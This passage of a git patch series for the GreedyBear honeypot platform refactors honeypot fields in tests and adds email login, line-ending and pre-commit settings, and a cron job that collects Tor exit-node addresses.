- IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, cowrie=True, last_seen=old_date)
+ cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+ ioc1 = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, last_seen=recent_date)
+ ioc1.general_honeypot.add(cowrie_hp)
+ ioc2 = IOC.objects.create(name="5.6.7.8", type="ip", scanner=True, last_seen=old_date)
+ ioc2.general_honeypot.add(cowrie_hp)
cutoff = datetime.now() - timedelta(days=30)
result = list(self.repo.get_recent_scanners(cutoff, days_lookback=30))
@@ -280,7 +291,9 @@ def test_get_recent_scanners_returns_recent_only(self):
def test_get_recent_scanners_excludes_non_scanners(self):
recent_date = datetime.now() - timedelta(days=5)
- IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, cowrie=True, last_seen=recent_date)
+ cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=False, last_seen=recent_date)
+ ioc.general_honeypot.add(cowrie_hp)
cutoff = datetime.now() - timedelta(days=30)
result = list(self.repo.get_recent_scanners(cutoff))
@@ -371,7 +384,9 @@ def test_get_scanners_by_pks_ioc_with_no_honeypots(self):
def test_get_recent_scanners_all_iocs_older_than_cutoff(self):
old_date = datetime.now() - timedelta(days=40)
- IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=old_date)
+ cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, last_seen=old_date)
+ ioc.general_honeypot.add(cowrie_hp)
cutoff = datetime.now() - timedelta(days=30)
result = list(self.repo.get_recent_scanners(cutoff))
@@ -420,8 +435,12 @@ def test_update_scores_with_repository(self):
from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
# Create test data
- IOC.objects.create(name="10.1.2.3", type="ip", scanner=True, cowrie=True, recurrence_probability=0.0)
- IOC.objects.create(name="10.5.6.7", type="ip", scanner=True, log4j=True, recurrence_probability=0.0)
+ cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+ log4pot_hp = GeneralHoneypot.objects.get_or_create(name="Log4pot", defaults={"active": True})[0]
+ ioc1 = IOC.objects.create(name="10.1.2.3", type="ip", scanner=True, recurrence_probability=0.0)
+ ioc1.general_honeypot.add(cowrie_hp)
+ ioc2 = IOC.objects.create(name="10.5.6.7", type="ip", scanner=True, recurrence_probability=0.0)
+ ioc2.general_honeypot.add(log4pot_hp)
# Create score dataframe
df = pd.DataFrame(
@@ -450,8 +469,12 @@ def test_update_scores_resets_missing_iocs(self):
from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
# Create test data - one IOC will be missing from df
- IOC.objects.create(name="10.2.3.4", type="ip", scanner=True, cowrie=True, recurrence_probability=0.9)
- IOC.objects.create(name="10.6.7.8", type="ip", scanner=True, log4j=True, recurrence_probability=0.8)
+ cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+ log4pot_hp = GeneralHoneypot.objects.get_or_create(name="Log4pot", defaults={"active": True})[0]
+ ioc1 = IOC.objects.create(name="10.2.3.4", type="ip", scanner=True, recurrence_probability=0.9)
+ ioc1.general_honeypot.add(cowrie_hp)
+ ioc2 = IOC.objects.create(name="10.6.7.8", type="ip", scanner=True, recurrence_probability=0.8)
+ ioc2.general_honeypot.add(log4pot_hp)
# DataFrame only has one IOC
df = pd.DataFrame({"value": ["10.2.3.4"], "recurrence_probability": [0.75], "expected_interactions": [10.0]})
@@ -470,7 +493,9 @@ def test_get_current_data_with_repository(self):
from greedybear.cronjobs.scoring.utils import get_current_data
recent_date = datetime.now() - timedelta(days=5)
- IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
+ cowrie_hp = GeneralHoneypot.objects.get_or_create(name="Cowrie", defaults={"active": True})[0]
+ ioc = IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, last_seen=recent_date)
+ ioc.general_honeypot.add(cowrie_hp)
result = get_current_data(days_lookback=30, ioc_repo=self.repo)
diff --git a/tests/test_models.py b/tests/test_models.py
index 67cabb9b..89d7124d 100644
--- a/tests/test_models.py
+++ b/tests/test_models.py
@@ -13,8 +13,9 @@ def test_ioc_model(self):
self.assertEqual(self.ioc.number_of_days_seen, 1)
self.assertEqual(self.ioc.attack_count, 1)
self.assertEqual(self.ioc.interaction_count, 1)
- self.assertEqual(self.ioc.log4j, True)
- self.assertEqual(self.ioc.cowrie, True)
+ # Honeypots are now via M2M relationship
+ self.assertIn(self.cowrie_hp, self.ioc.general_honeypot.all())
+ self.assertIn(self.log4pot_hp, self.ioc.general_honeypot.all())
self.assertEqual(self.ioc.scanner, True)
self.assertEqual(self.ioc.payload_request, True)
self.assertEqual(self.ioc.related_urls, [])
diff --git a/tests/test_scoring_utils.py b/tests/test_scoring_utils.py
index aed4752b..815b534b 100644
--- a/tests/test_scoring_utils.py
+++ b/tests/test_scoring_utils.py
@@ -100,7 +100,7 @@ def test_feature_extraction(self):
self.assertEqual(str(feature["days_seen"][0]), today)
self.assertEqual(feature["asn"], "12345")
self.assertTrue(len(feature["honeypots"]) > 0)
- self.assertTrue(set(feature["honeypots"]).issubset({"heralding", "ciscoasa", "log4j", "cowrie"}))
+ self.assertTrue(set(feature["honeypots"]).issubset({"heralding", "ciscoasa", "log4pot", "cowrie"}))
self.assertEqual(feature["honeypot_count"], len(feature["honeypots"]))
self.assertEqual(feature["destination_port_count"], 3)
self.assertEqual(feature["days_seen_count"], 1)
@@ -124,7 +124,7 @@ def test_multi_label_encode_ioc(self):
features = get_features(data, today)
features = multi_label_encode(features, "honeypots").to_dict("records")
features.sort(key=lambda d: d["value"], reverse=True)
- for h in ["heralding", "ciscoasa", "log4j", "cowrie"]:
+ for h in ["heralding", "ciscoasa", "log4pot", "cowrie"]:
self.assertEqual(features[1][f"has_{h}"], 1)
def test_multi_label_encode_sample(self):
diff --git a/tests/test_serializers.py b/tests/test_serializers.py
index e7861e25..e537b882 100644
--- a/tests/test_serializers.py
+++ b/tests/test_serializers.py
@@ -19,7 +19,7 @@ def setUpTestData(cls):
def test_valid_fields(self):
choices = {
- "feed_type": ["all", "log4j", "cowrie", "adbhoney"],
+ "feed_type": ["all", "log4pot", "cowrie", "adbhoney"],
"attack_type": ["all", "scanner", "payload_request"],
"ioc_type": ["ip", "domain", "all"],
"max_age": [str(n) for n in [1, 2, 4, 8, 16]],
@@ -53,7 +53,7 @@ def test_valid_fields(self):
self.assertEqual(valid, True)
def test_invalid_fields(self):
- valid_feed_types = frozenset(["all", "log4j", "cowrie", "adbhoney"])
+ valid_feed_types = frozenset(["all", "log4pot", "cowrie", "adbhoney"])
data_ = {
"feed_type": "invalid_feed_type",
"attack_type": "invalid_attack_type",
@@ -98,7 +98,7 @@ def setUpTestData(cls):
def test_valid_fields(self):
scanner_choices = [True, False]
payload_request_choices = [True, False]
- feed_type_choices = ["all", "log4j", "cowrie", "adbhoney"]
+ feed_type_choices = ["all", "log4pot", "cowrie", "adbhoney"]
# generete all possible valid input data using cartesian product
valid_data_choices = product(scanner_choices, payload_request_choices, feed_type_choices)
@@ -129,7 +129,7 @@ def test_valid_fields(self):
self.assertEqual(valid, True)
def test_invalid_fields(self):
- valid_feed_types = frozenset(["all", "log4j", "cowrie", "adbhoney"])
+ valid_feed_types = frozenset(["all", "log4pot", "cowrie", "adbhoney"])
data_ = {
"feed_type": "invalid_feed_type",
"value": True,
diff --git a/tests/test_views.py b/tests/test_views.py
index 3b20b4e6..fe869d60 100644
--- a/tests/test_views.py
+++ b/tests/test_views.py
@@ -42,10 +42,12 @@ def test_for_vaild_registered_ip(self):
)
self.assertEqual(response.json()["ioc"]["number_of_days_seen"], self.ioc.number_of_days_seen)
self.assertEqual(response.json()["ioc"]["attack_count"], self.ioc.attack_count)
- self.assertEqual(response.json()["ioc"]["log4j"], self.ioc.log4j)
- self.assertEqual(response.json()["ioc"]["cowrie"], self.ioc.cowrie)
- self.assertEqual(response.json()["ioc"]["general_honeypot"][0], self.heralding.name) # FEEDS
- self.assertEqual(response.json()["ioc"]["general_honeypot"][1], self.ciscoasa.name) # FEEDS
+ # Honeypots are now via M2M relationship (serialized as list of strings)
+ honeypot_names = response.json()["ioc"]["general_honeypot"]
+ self.assertIn(self.heralding.name, honeypot_names)
+ self.assertIn(self.ciscoasa.name, honeypot_names)
+ self.assertIn(self.cowrie_hp.name, honeypot_names)
+ self.assertIn(self.log4pot_hp.name, honeypot_names)
self.assertEqual(response.json()["ioc"]["scanner"], self.ioc.scanner)
self.assertEqual(response.json()["ioc"]["payload_request"], self.ioc.payload_request)
self.assertEqual(
@@ -65,8 +67,8 @@ def test_for_invalid_authentication(self):
class FeedsViewTestCase(CustomTestCase):
- def test_200_log4j_feeds(self):
- response = self.client.get("/api/feeds/log4j/all/recent.json")
+ def test_200_log4pot_feeds(self):
+ response = self.client.get("/api/feeds/log4pot/all/recent.json")
self.assertEqual(response.status_code, 200)
if settings.FEEDS_LICENSE:
self.assertEqual(response.json()["license"], settings.FEEDS_LICENSE)
@@ -77,7 +79,11 @@ def test_200_log4j_feeds(self):
target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
self.assertIsNotNone(target_ioc)
- self.assertEqual(target_ioc["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
+ # feed_type now derived from general_honeypot M2M
+ self.assertIn("log4pot", target_ioc["feed_type"])
+ self.assertIn("cowrie", target_ioc["feed_type"])
+ self.assertIn("heralding", target_ioc["feed_type"])
+ self.assertIn("ciscoasa", target_ioc["feed_type"])
self.assertEqual(target_ioc["attack_count"], 1)
self.assertEqual(target_ioc["scanner"], True)
self.assertEqual(target_ioc["payload_request"], True)
@@ -111,7 +117,7 @@ def test_200_general_feeds(self):
target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
self.assertIsNotNone(target_ioc)
- self.assertEqual(target_ioc["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
+ self.assertEqual(set(target_ioc["feed_type"]), {"log4pot", "cowrie", "heralding", "ciscoasa"})
self.assertEqual(target_ioc["attack_count"], 1)
self.assertEqual(target_ioc["scanner"], True)
self.assertEqual(target_ioc["payload_request"], True)
@@ -206,7 +212,7 @@ def test_200_all_feeds(self):
target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
self.assertIsNotNone(target_ioc)
- self.assertEqual(target_ioc["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
+ self.assertEqual(set(target_ioc["feed_type"]), {"log4pot", "cowrie", "heralding", "ciscoasa"})
self.assertEqual(target_ioc["attack_count"], 1)
self.assertEqual(target_ioc["scanner"], True)
self.assertEqual(target_ioc["payload_request"], True)
@@ -225,7 +231,7 @@ def test_200_general_feeds(self):
target_ioc = next((i for i in iocs if i["value"] == self.ioc.name), None)
self.assertIsNotNone(target_ioc)
- self.assertEqual(target_ioc["feed_type"], ["log4j", "cowrie", "heralding", "ciscoasa"])
+ self.assertEqual(set(target_ioc["feed_type"]), {"log4pot", "cowrie", "heralding", "ciscoasa"})
self.assertEqual(target_ioc["attack_count"], 1)
self.assertEqual(target_ioc["scanner"], True)
self.assertEqual(target_ioc["payload_request"], True)
@@ -299,17 +305,18 @@ def test_200_enrichment_requests(self):
self.assertEqual(response.json()[0]["Requests"], 1)
def test_200_feed_types(self):
- self.assertEqual(GeneralHoneypot.objects.count(), 3)
+ # Count honeypots before adding new one
+ initial_count = GeneralHoneypot.objects.count()
# add a general honeypot without associated ioc
GeneralHoneypot(name="Tanner", active=True).save()
- self.assertEqual(GeneralHoneypot.objects.count(), 4)
+ self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
response = self.client.get("/api/statistics/feeds_types")
self.assertEqual(response.status_code, 200)
# Expecting 3 because setupTestData creates 3 IOCs (ioc, ioc_2, ioc_domain) associated with Heralding
self.assertEqual(response.json()[0]["Heralding"], 3)
self.assertEqual(response.json()[0]["Ciscoasa"], 2)
- self.assertEqual(response.json()[0]["Log4j"], 3)
+ self.assertEqual(response.json()[0]["Log4pot"], 3)
self.assertEqual(response.json()[0]["Cowrie"], 3)
self.assertEqual(response.json()[0]["Tanner"], 0)
From 33a27542c619291d8d4459fba5c2928c6c7ebddd Mon Sep 17 00:00:00 2001
From: M4N45W1
Date: Fri, 23 Jan 2026 19:58:03 +0530
Subject: [PATCH 59/75] Feature: auth using mail. Closes #528 (#723)
---
authentication/serializers.py | 14 ++-
tests/authentication/test_auth_via_email.py | 100 ++++++++++++++++++++
2 files changed, 112 insertions(+), 2 deletions(-)
create mode 100644 tests/authentication/test_auth_via_email.py
diff --git a/authentication/serializers.py b/authentication/serializers.py
index 960a7bab..df86986f 100644
--- a/authentication/serializers.py
+++ b/authentication/serializers.py
@@ -10,6 +10,7 @@
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import DatabaseError, transaction
+from django.db.models import Q
from rest_framework import serializers as rfs
from rest_framework.authtoken.serializers import AuthTokenSerializer
from slack_sdk.errors import SlackApiError
@@ -140,11 +141,21 @@ def save(self):
class LoginSerializer(AuthTokenSerializer):
def validate(self, attrs):
+ login_value = attrs.get("username")
+ # If user has entered email we try email->username mapping
+ try:
+ user = User.objects.get(email__iexact=login_value)
+ attrs["username"] = user.username
+ except User.DoesNotExist:
+ # Either user has entered username, or email entered doesn't exist
+ pass
+
try:
return super().validate(attrs)
except rfs.ValidationError as exc:
try:
- user = User.objects.get(username=attrs["username"])
+ # Check if either of the two, username or email exists
+ user = User.objects.get(Q(username=login_value) | Q(email__iexact=login_value))
except User.DoesNotExist:
# we do not want to leak info
# so just raise the original exception without context
@@ -159,5 +170,4 @@ def validate(self, attrs):
elif user.approved is False:
exc.detail = "Your account was declined."
logger.info(f"User {user} is not active. Error message: {exc.detail}")
- # else
raise exc from None
diff --git a/tests/authentication/test_auth_via_email.py b/tests/authentication/test_auth_via_email.py
new file mode 100644
index 00000000..f63f6469
--- /dev/null
+++ b/tests/authentication/test_auth_via_email.py
@@ -0,0 +1,100 @@
+from django.contrib.auth import get_user_model
+from django.core import mail
+from django.core.cache import cache
+from django.test import tag
+from durin.models import AuthToken, Client
+from rest_framework.reverse import reverse
+
+from . import CustomOAuthTestCase
+
+User = get_user_model()
+login_uri = reverse("auth_login")
+logout_uri = reverse("auth_logout")
+register_uri = reverse("auth_register")
+verify_email_uri = reverse("auth_verify-email")
+
+
+@tag("api", "user")
+class TestUserAuth(CustomOAuthTestCase):
+ def __register_user(self, body: dict):
+ response = self.client.post(register_uri, {**body}, format="json")
+ content = response.json()
+ msg = (response, content)
+
+ # response assertions
+ self.assertEqual(201, response.status_code, msg=msg)
+ self.assertEqual(content["username"], body["username"], msg=msg)
+ self.assertEqual(content["email"], body["email"], msg=msg)
+ self.assertFalse(content["is_active"], msg="newly registered user must have is_active=False")
+
+ def setUp(self):
+ # test data
+ self.testregisteruser = {
+ "email": "testregisteruser@test.com",
+ "username": "testregisteruser",
+ "first_name": "testregisteruser",
+ "last_name": "testregisteruser",
+ "password": "testregisteruser",
+ "profile": {
+ "company_name": "companytest",
+ "company_role": "greedybear test",
+ "twitter_handle": "@fake",
+ "discover_from": "other",
+ },
+ }
+ mail.outbox = []
+ self.__register_user(body=self.testregisteruser)
+ self.user = User.objects.get(username=self.testregisteruser["username"])
+
+ def tearDown(self): # skipcq: PYL-R0201
+ # cache clear (for throttling)
+ cache.clear()
+ # db clean
+ AuthToken.objects.all().delete()
+ Client.objects.all().delete()
+
+ def verify_user(self):
+ # Verify user and mail
+ email = self.user.email_addresses.first()
+ email.is_verified = True
+ self.user.is_active = True
+ self.user.save()
+ email.save()
+
+ def test_login_via_mail(self):
+ # Using email for login
+ self.verify_user()
+ password = self.testregisteruser["password"]
+ body = {"username": self.user.email, "password": password}
+ response = self.client.post(login_uri, body)
+ cookies_data = response.cookies
+ msg = (response, cookies_data)
+ self.assertEqual(response.status_code, 200, msg=msg)
+ self.assertIn("CERTEGO_SAAS_AUTH_TOKEN", cookies_data, msg=msg)
+
+ self.assertEqual(AuthToken.objects.count(), 1)
+
+ def test_unverified_login_via_email(self):
+ # User unverified should fail
+ password = self.testregisteruser["password"]
+ body = {"username": self.user.email, "password": password}
+ response = self.client.post(login_uri, body)
+ cookies_data = response.cookies
+ msg = (response, cookies_data)
+ self.assertEqual(response.status_code, 400, msg=msg)
+ self.assertNotIn("CERTEGO_SAAS_AUTH_TOKEN", cookies_data, msg=msg)
+
+ self.assertEqual(AuthToken.objects.count(), 0)
+
+ def test_login_via_username(self):
+ # Testing login via username
+ self.verify_user()
+ password = self.testregisteruser["password"]
+ body = {"username": self.user.username, "password": password}
+ response = self.client.post(login_uri, body)
+ cookies_data = response.cookies
+ msg = (response, cookies_data)
+ self.assertEqual(response.status_code, 200, msg=msg)
+ self.assertIn("CERTEGO_SAAS_AUTH_TOKEN", cookies_data, msg=msg)
+
+ self.assertEqual(AuthToken.objects.count(), 1)
From 2dff54633f37f79d2f7d79b216ab04ede52cc865 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Mon, 26 Jan 2026 14:27:55 +0530
Subject: [PATCH 60/75] Standardize line endings and integrate frontend
linters. Closes #729, Closes #727 (#730)
* fix: standardize line endings and integrate frontend linters into pre-commit
Fixes #729: Fix inconsistent line endings causing CI failures on Windows
- Update Ruff config to enforce LF line endings (line-ending = 'lf')
- Add .gitattributes to normalize line endings via Git
Fixes #727: Integrate Frontend Linters into Pre-commit Workflow
- Add Prettier hook using local npm script (npm run formatter)
- Add ESLint hook using local npm script (npm run lint)
- Uses same linter versions as CI to ensure consistency
* feat: skip frontend hooks if node_modules not installed
Frontend pre-commit hooks (prettier, eslint) now gracefully skip if
frontend/node_modules doesn't exist. This allows backend-only contributors
to use pre-commit without needing to run npm install in frontend/.
---
.gitattributes | 67 +++++++++++++++++++
.github/.pre-commit-config.yaml | 23 +++++++
.../configurations/python_linters/.ruff.toml | 2 +-
3 files changed, 91 insertions(+), 1 deletion(-)
create mode 100644 .gitattributes
diff --git a/.gitattributes b/.gitattributes
new file mode 100644
index 00000000..26310858
--- /dev/null
+++ b/.gitattributes
@@ -0,0 +1,67 @@
+# =============================================================================
+# Git Attributes Configuration for GreedyBear
+# Ensures consistent line endings across all platforms
+# =============================================================================
+
+# Default behavior: Auto-detect text files and normalize to LF
+* text=auto eol=lf
+
+# -----------------------------------------------------------------------------
+# Text files (normalize to LF)
+# -----------------------------------------------------------------------------
+
+# Python
+*.py text eol=lf
+
+# JavaScript/React
+*.js text eol=lf
+*.jsx text eol=lf
+*.mjs text eol=lf
+*.cjs text eol=lf
+
+# Styles
+*.css text eol=lf
+*.scss text eol=lf
+
+# Web
+*.html text eol=lf
+
+# Config files
+*.json text eol=lf
+*.yml text eol=lf
+*.yaml text eol=lf
+*.toml text eol=lf
+*.conf text eol=lf
+
+# Documentation
+*.md text eol=lf
+*.txt text eol=lf
+
+# Shell scripts
+*.sh text eol=lf
+
+# Docker
+Dockerfile text eol=lf
+Dockerfile_nginx text eol=lf
+
+# Git
+.gitignore text eol=lf
+.gitattributes text eol=lf
+
+# -----------------------------------------------------------------------------
+# Binary files (do not normalize)
+# -----------------------------------------------------------------------------
+
+# Images
+*.png binary
+*.ico binary
+
+# -----------------------------------------------------------------------------
+# Linguist overrides (GitHub language statistics)
+# -----------------------------------------------------------------------------
+
+# Exclude from language statistics
+*.min.js linguist-vendored
+*.min.css linguist-vendored
+**/migrations/* linguist-generated
+package-lock.json linguist-generated
diff --git a/.github/.pre-commit-config.yaml b/.github/.pre-commit-config.yaml
index 8da56aab..08c9b4c2 100644
--- a/.github/.pre-commit-config.yaml
+++ b/.github/.pre-commit-config.yaml
@@ -1,4 +1,5 @@
repos:
+# Python linting with Ruff
- repo: https://github.com/astral-sh/ruff-pre-commit
rev: v0.12.7
hooks:
@@ -7,3 +8,25 @@ repos:
args: ["--fix", "--config", "./.github/configurations/python_linters/.ruff.toml"]
- id: ruff-format
args: ["--config", "./.github/configurations/python_linters/.ruff.toml"]
+
+# Frontend formatting with Prettier (using local npm)
+# Skips if frontend/node_modules doesn't exist (for backend-only contributors)
+- repo: local
+ hooks:
+ - id: prettier
+ name: prettier
+ entry: bash -c 'if [ -d frontend/node_modules ]; then cd frontend && npm run formatter; else echo "Skipping prettier - run npm install in frontend/ to enable"; fi'
+ language: system
+ files: ^frontend/src/.*\.(js|jsx)$|^frontend/tests/.*\.(js|jsx)$|^frontend/src/styles/.*\.(css|scss)$
+ pass_filenames: false
+
+# Frontend linting with ESLint (using local npm)
+# Skips if frontend/node_modules doesn't exist (for backend-only contributors)
+- repo: local
+ hooks:
+ - id: eslint
+ name: eslint
+ entry: bash -c 'if [ -d frontend/node_modules ]; then cd frontend && npm run lint; else echo "Skipping eslint - run npm install in frontend/ to enable"; fi'
+ language: system
+ files: ^frontend/src/.*\.(js|jsx)$|^frontend/tests/.*\.(js|jsx)$
+ pass_filenames: false
diff --git a/.github/configurations/python_linters/.ruff.toml b/.github/configurations/python_linters/.ruff.toml
index 12daab7d..3d61ba06 100644
--- a/.github/configurations/python_linters/.ruff.toml
+++ b/.github/configurations/python_linters/.ruff.toml
@@ -30,7 +30,7 @@ docstring-code-format = true
indent-style = "space"
-line-ending = "native"
+line-ending = "lf"
quote-style = "double"
From 4b5ec0236051ec7842900715801709928f12a36e Mon Sep 17 00:00:00 2001
From: Sumit Das
Date: Mon, 26 Jan 2026 17:14:51 +0530
Subject: [PATCH 61/75] =?UTF-8?q?feat:=20Add=20Tor=20exit=20node=20extract?=
=?UTF-8?q?ion=20with=20separate=20TorExitNode=20model=20(#=E2=80=A6=20(#7?=
=?UTF-8?q?28)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
* feat: Add Tor exit node extraction with separate TorExitNode model (#547)
* fix: use CustomTestCase and add task scheduling
Thanks for the review! Made both changes:
- Switched to CustomTestCase for test consistency
- Added weekly Celery Beat schedule (Sundays at 4:30 AM)
Addresses feedback from @regulartim
* fix: address review feedback for tor exit node feature
- Added migration file for TorExitNode model (0032)
- Fixed case sensitivity issue - changed 'Tor Exit Node' to lowercase for API filtering
- Registered TorExitNode in admin panel for easy management
---------
Co-authored-by: SUMIT DAS
---
greedybear/admin.py | 8 ++
greedybear/celery.py | 5 +
greedybear/cronjobs/repositories/__init__.py | 1 +
greedybear/cronjobs/repositories/tor.py | 24 +++++
greedybear/cronjobs/tor_exit_nodes.py | 55 +++++++++++
greedybear/migrations/0032_torexitnode.py | 35 +++++++
greedybear/models.py | 14 +++
greedybear/tasks.py | 7 ++
tests/test_tor.py | 97 ++++++++++++++++++++
9 files changed, 246 insertions(+)
create mode 100644 greedybear/cronjobs/repositories/tor.py
create mode 100644 greedybear/cronjobs/tor_exit_nodes.py
create mode 100644 greedybear/migrations/0032_torexitnode.py
create mode 100644 tests/test_tor.py
diff --git a/greedybear/admin.py b/greedybear/admin.py
index 830e34c6..b3752bf1 100644
--- a/greedybear/admin.py
+++ b/greedybear/admin.py
@@ -15,12 +15,20 @@
MassScanner,
Sensor,
Statistics,
+ TorExitNode,
WhatsMyIPDomain,
)
logger = logging.getLogger(__name__)
+@admin.register(TorExitNode)
+class TorExitNodeModelAdmin(admin.ModelAdmin):
+ list_display = ["ip_address", "added", "reason"]
+ search_fields = ["ip_address"]
+ search_help_text = ["search for the IP address"]
+
+
@admin.register(Sensor)
class SensorsModelAdmin(admin.ModelAdmin):
list_display = [field.name for field in Sensor._meta.get_fields()]
diff --git a/greedybear/celery.py b/greedybear/celery.py
index e3d79c4e..db1500e2 100644
--- a/greedybear/celery.py
+++ b/greedybear/celery.py
@@ -117,4 +117,9 @@ def setup_loggers(*args, **kwargs):
"schedule": crontab(hour=4, minute=15, day_of_week=0),
"options": {"queue": "default"},
},
+ "get_tor_exit_nodes": {
+ "task": "greedybear.tasks.get_tor_exit_nodes",
+ "schedule": crontab(hour=4, minute=30, day_of_week=0),
+ "options": {"queue": "default"},
+ },
}
diff --git a/greedybear/cronjobs/repositories/__init__.py b/greedybear/cronjobs/repositories/__init__.py
index 30133430..84df974e 100644
--- a/greedybear/cronjobs/repositories/__init__.py
+++ b/greedybear/cronjobs/repositories/__init__.py
@@ -4,3 +4,4 @@
from greedybear.cronjobs.repositories.ioc import *
from greedybear.cronjobs.repositories.mass_scanner import *
from greedybear.cronjobs.repositories.sensor import *
+from greedybear.cronjobs.repositories.tor import *
diff --git a/greedybear/cronjobs/repositories/tor.py b/greedybear/cronjobs/repositories/tor.py
new file mode 100644
index 00000000..0e2a6bf7
--- /dev/null
+++ b/greedybear/cronjobs/repositories/tor.py
@@ -0,0 +1,24 @@
+import logging
+
+from greedybear.models import TorExitNode
+
+
+class TorRepository:
+ """Repository for data access to Tor exit node entries."""
+
+ def __init__(self):
+ self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
+
+ def get_or_create(self, ip_address: str, reason: str = "tor exit node") -> tuple[TorExitNode, bool]:
+ """
+ Get an existing Tor exit node entry or create a new one.
+
+ Args:
+ ip_address: IP address of the Tor exit node.
+ reason: Reason/description (default: "tor exit node").
+
+ Returns:
+ Tuple of (TorExitNode object, created_flag) where created_flag is True if new.
+ """
+ node, created = TorExitNode.objects.get_or_create(ip_address=ip_address, defaults={"reason": reason})
+ return node, created
diff --git a/greedybear/cronjobs/tor_exit_nodes.py b/greedybear/cronjobs/tor_exit_nodes.py
new file mode 100644
index 00000000..b4d0609b
--- /dev/null
+++ b/greedybear/cronjobs/tor_exit_nodes.py
@@ -0,0 +1,55 @@
+import re
+
+import requests
+
+from greedybear.cronjobs.base import Cronjob
+from greedybear.cronjobs.extraction.utils import is_valid_ipv4
+from greedybear.cronjobs.repositories import IocRepository
+from greedybear.cronjobs.repositories.tor import TorRepository
+
+
+class TorExitNodesCron(Cronjob):
+ """Fetch and store Tor exit node IP addresses from Tor Project."""
+
+ def __init__(self, tor_repo=None, ioc_repo=None):
+ super().__init__()
+ self.tor_repo = tor_repo if tor_repo is not None else TorRepository()
+ self.ioc_repo = ioc_repo if ioc_repo is not None else IocRepository()
+
+ def run(self) -> None:
+ """Fetch Tor exit node IPs from torproject.org and store them."""
+ ip_regex = re.compile(r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}")
+
+ try:
+ self.log.info("Starting download of Tor exit node list from torproject.org")
+
+ r = requests.get(
+ "https://check.torproject.org/exit-addresses",
+ timeout=10,
+ )
+ r.raise_for_status()
+
+ findings = ip_regex.findall(r.text)
+
+ for ip_candidate in findings:
+ is_valid, ip_address = is_valid_ipv4(ip_candidate)
+ if not is_valid:
+ self.log.debug(f"Invalid IPv4 address: {ip_candidate}")
+ continue
+
+ tor_node, created = self.tor_repo.get_or_create(ip_address)
+ if created:
+ self.log.info(f"Added new Tor exit node {ip_address}")
+ self._update_old_ioc(ip_address)
+
+ self.log.info("Completed download of Tor exit node list")
+
+ except requests.RequestException as e:
+ self.log.error(f"Failed to fetch Tor exit nodes: {e}")
+ raise
+
+ def _update_old_ioc(self, ip_address: str):
+ """Update the IP reputation of an existing IOC to mark it as a Tor exit node."""
+ updated = self.ioc_repo.update_ioc_reputation(ip_address, "tor exit node")
+ if updated:
+ self.log.debug(f"Updated IOC {ip_address} reputation to 'tor exit node'")
diff --git a/greedybear/migrations/0032_torexitnode.py b/greedybear/migrations/0032_torexitnode.py
new file mode 100644
index 00000000..d35b5ebf
--- /dev/null
+++ b/greedybear/migrations/0032_torexitnode.py
@@ -0,0 +1,35 @@
+# Generated by Django 5.2.10 on 2026-01-26 10:00
+
+import datetime
+
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+ dependencies = [
+ ("greedybear", "0031_remove_cowrie_log4j_fields"),
+ ]
+
+ operations = [
+ migrations.CreateModel(
+ name="TorExitNode",
+ fields=[
+ (
+ "id",
+ models.BigAutoField(
+ auto_created=True,
+ primary_key=True,
+ serialize=False,
+ verbose_name="ID",
+ ),
+ ),
+ ("ip_address", models.CharField(max_length=256, unique=True)),
+ ("added", models.DateTimeField(default=datetime.datetime.now)),
+ ("reason", models.CharField(blank=True, default="tor exit node", max_length=64)),
+ ],
+ ),
+ migrations.AddIndex(
+ model_name="torexitnode",
+ index=models.Index(fields=["ip_address"], name="greedybear_ip_addr_tor_idx"),
+ ),
+ ]
diff --git a/greedybear/models.py b/greedybear/models.py
index dc71c6be..9aee1fdf 100644
--- a/greedybear/models.py
+++ b/greedybear/models.py
@@ -154,6 +154,20 @@ def __str__(self):
return f"{self.ip_address}{f' ({self.reason})' if self.reason else ''}"
+class TorExitNode(models.Model):
+ ip_address = models.CharField(max_length=256, blank=False, unique=True)
+ added = models.DateTimeField(blank=False, default=datetime.now)
+ reason = models.CharField(max_length=64, blank=True, default="tor exit node")
+
+ class Meta:
+ indexes = [
+ models.Index(fields=["ip_address"]),
+ ]
+
+ def __str__(self):
+ return f"{self.ip_address} (tor exit node)"
+
+
class WhatsMyIPDomain(models.Model):
domain = models.CharField(max_length=256, blank=False)
added = models.DateTimeField(blank=False, default=datetime.now)
diff --git a/greedybear/tasks.py b/greedybear/tasks.py
index f3c24786..db2e9bb4 100644
--- a/greedybear/tasks.py
+++ b/greedybear/tasks.py
@@ -76,3 +76,10 @@ def extract_firehol_lists():
from greedybear.cronjobs.firehol import FireHolCron
FireHolCron().execute()
+
+
+@shared_task()
+def get_tor_exit_nodes():
+ from greedybear.cronjobs.tor_exit_nodes import TorExitNodesCron
+
